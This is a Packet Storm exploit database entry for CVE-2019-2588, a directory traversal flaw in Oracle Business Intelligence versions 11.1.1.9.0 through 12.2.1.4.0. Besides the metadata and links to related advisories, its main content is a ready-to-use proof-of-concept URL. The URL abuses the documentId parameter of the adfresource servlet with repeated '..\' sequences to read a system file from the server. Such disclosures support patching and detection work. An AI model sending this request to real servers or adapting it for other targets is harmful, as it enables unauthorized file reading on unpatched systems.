Lucene search
Vahagn VardanyanPACKETSTORM:152572HistoryApr 19, 2019 - 12:00 a.m.
Oracle Business Intelligence Directory Traversal
2019-04-1900:00:00
Vahagn Vardanyan
packetstormsecurity.com
148
0.084 Low
EPSS
Percentile
93.8%
`# Exploit Title: Directory traversal in Oracle Business Intelligence
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2588
PoC
http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
`
Related
prion
prion
Design/Logic Flaw
2019-04-23 19:32:00
cve
cve
CVE-2019-2588
2019-04-23 19:32:00
exploitpack
exploitpack
nuclei
nuclei
Oracle Business Intelligence - Path Traversal
2020-06-22 13:35:37
zdt
zdt
exploitdb
exploitdb
nessus
nessus
oracle
oracle
Oracle Critical Patch Update Advisory - April 2019
2019-04-16 00:00:00